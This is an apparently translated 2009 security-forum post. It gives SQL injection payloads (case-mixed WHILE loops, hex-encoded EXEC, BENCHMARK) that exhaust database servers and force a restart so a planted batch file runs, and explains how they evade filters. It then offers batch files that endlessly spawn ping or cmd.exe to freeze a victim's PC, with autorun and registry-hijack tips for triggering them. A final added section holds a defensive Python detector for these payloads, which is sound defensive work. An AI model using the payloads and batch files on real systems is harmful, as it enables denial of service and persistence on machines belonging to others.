Let the administrator help you restart the machine - vulnerability warning - Black Bar Safety Net

2009-09-05T00:00:00
ID MYHACK58:62200924545
Type myhack58
Reporter Anonymous (佚名)
Modified 2009-09-05T00:00:00

Description

Let the administrator help you restart the machine

Sometimes, after getting into the database through a backup, we drop a batch file into the Startup menu and want the server to run it the next time it restarts. But we wait and wait, and the server never restarts. What then? Get the administrator to restart it for us.

The injection code below makes the server stop responding, or respond very slowly. For better effect, throw it at the injection point several times; eventually an administrator will restart the server.

Numeric injection point:

;wHiLe 1<9 bEgIn select cHaR(0) eNd--

Character-type injection point:

';wHiLe 1<9 bEgIn select cHaR(0) eNd--

Or use the DECLARE + EXEC form:

;dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

';dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--

The code above produces an infinite loop on the database server; the server's resources are exhausted and it stops serving requests (a denial of service). The administrator will then restart the server for you.

Note: the code above is offensive; use it with caution.
Note: select char(0) can be changed to select power(1.23456,100) to increase the amount of computation per iteration.

----------------------------------------------------------

;wHiLe 1<9 bEgIn select cHaR(0) eNd--

This statement means: while 1 is less than 9, select the character whose ASCII code is 0. Because the condition is a constant that always holds, the loop never ends and runs until the machine's resources are exhausted. Mixing upper and lower case in the keywords is meant to get past the website's anti-injection filter.

;declare @s varchar(8000) set @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 exec(@s)--

declare @s varchar(8000) defines @s as a varchar of length 8000. The string "wHiLe 1<9 bEgIn select cHaR(0) eNd" is assigned to @s as a HEX-encoded value, and exec then runs it. This too serves to get past the website's anti-injection filter.

';wHiLe 1<9 bEgIn select cHaR(0) eNd--

The leading ' is there because the injection point is of character type.

Anyway, I have not explained it very clearly. select power(1.23456,100) returns 1.23456 raised to the 100th power; it would be strange if the server did not die. The concat function belongs to the same series of tricks as the upper/lower-case difference. benchmark(9999999999999,md5('test')) reports the elapsed running time back to the client, which may be useful for blind injection. I don't know whether the concat function can be used to attack. The hex encoding of w is 0x77, so benchmark(9999999999999,md5(0x77)) might get past anti-injection filters. Scribbled down at random; experts, please don't laugh.

----------------------------------------------------------------------------------------------------

Infinite-loop ping, enhanced edition

Source: color radish's blog

Suggestion: test it on a virtual machine, or run the modified batch file on someone else's computer. It can make her computer unresponsive, and she has to restart the machine. If you have a virus you can put it in the boot entries; the virus can also add an Autorun file with open=<path to this batch>, and then hijack the image paths in the registry, so that when she clicks QQ, MSN, IE or other commonly used tools the batch file is activated. Let her struggle with it.

Also tested on a dual-core machine: the only way out was a restart, and the response is N times better than the earlier version that simply wrote a loop. Had a chance to type shutdown -a, close the group and other operations, oh. Purely for entertainment. It does no harm to system files; after a restart there is no damage. My test source file is in the attachment; if you are lazy, you can download it.

Attached source file contents (note: extract both files into the same directory).

Start.bat

@echo off
color 2f
echo.
title an infinite loop of ping-enhanced-Edition-zzw production
echo ####################################################################
echo # an infinite loop of ping-enhanced-Edition-zzw production #
echo ####################################################################
echo.
:loop
start zzw.bat
goto :loop
echo startup completed

zzw.bat

@echo off
ping 127.0.0.1 -l 65500 -t

Attached to the previous loop batch

@echo off
:loop
start cmd.exe
goto :loop

Of course, someone will ask why not replace cmd.exe with some other application. You can, but only if you know which large applications her computer has.
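Returning to the injection payloads in the first part of the page: the mixed-case keywords and the hex-encoded EXEC string are both aimed at filters that match raw request text, so a defender's filter or log-triage rule has to normalize before matching. The following detection function is an added example written for this page, not code from the original article; it case-folds the input, decodes 0x hex literals back to text, and then looks for the resource-exhaustion constructs the article describes (a constant-true WHILE loop, dynamic EXEC of a variable, a huge BENCHMARK count, a heavy POWER call). The sample inputs are constructed from the payloads quoted above.

```python
import re

# Constructed samples modelled on the payloads quoted in the article (not taken from any live log).
SAMPLES = {
    "numeric": ";wHiLe 1<9 bEgIn select cHaR(0) eNd--",
    "string": "';wHiLe 1<9 bEgIn select cHaR(0) eNd--",
    "hex_exec": ";dEcLaRe @s vArChAr(8000) sEt @s=0x7748694c6520313c3920624567496e2073456c456354206348615228302920654e64 eXeC(@s)--",
    "benchmark": "1 and benchmark(9999999999999,md5(0x77))--",
    "power": ";wHiLe 1<9 bEgIn select power(1.23456,100) eNd--",
    "benign": "id=42 order by name",
}

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

def decode_hex_literals(text: str) -> str:
    """Replace each 0x... literal with its ASCII decoding when that decoding is printable text."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            decoded = bytes.fromhex(digits).decode("ascii")
        except UnicodeDecodeError:
            return m.group(0)
        return decoded if decoded.isprintable() else m.group(0)
    return HEX_LITERAL.sub(repl, text)

def normalize(text: str) -> str:
    """Case-fold, decode hex literals twice (a decoded literal may itself contain one), collapse whitespace."""
    out = text
    for _ in range(2):
        out = decode_hex_literals(out)
    return re.sub(r"\s+", " ", out.lower())

# Indicators of the CPU-burning constructs described on the page, matched against normalized text.
INDICATORS = {
    "unbounded_while_loop": re.compile(r"\bwhile\b\s+(\d+)\s*<\s*(\d+)\s+begin\b"),
    "dynamic_exec": re.compile(r"\bexec\s*\(\s*@\w+\s*\)"),
    "benchmark": re.compile(r"\bbenchmark\s*\(\s*\d{7,}\s*,"),
    "heavy_power": re.compile(r"\bpower\s*\(\s*[\d.]+\s*,\s*\d{2,}\s*\)"),
}

def classify(text: str) -> list:
    """Return the names of the DoS-injection indicators present in the input, in INDICATORS order."""
    norm = normalize(text)
    hits = []
    for name, pattern in INDICATORS.items():
        m = pattern.search(norm)
        if not m:
            continue
        # A WHILE loop only counts when its constant condition is always true (e.g. 1<9, never 9<1).
        if name == "unbounded_while_loop" and int(m.group(1)) >= int(m.group(2)):
            continue
        hits.append(name)
    return hits
```

Run `classify()` over each request parameter or logged query fragment; a non-empty result is worth alerting on even if the raw text matched none of the usual keyword signatures.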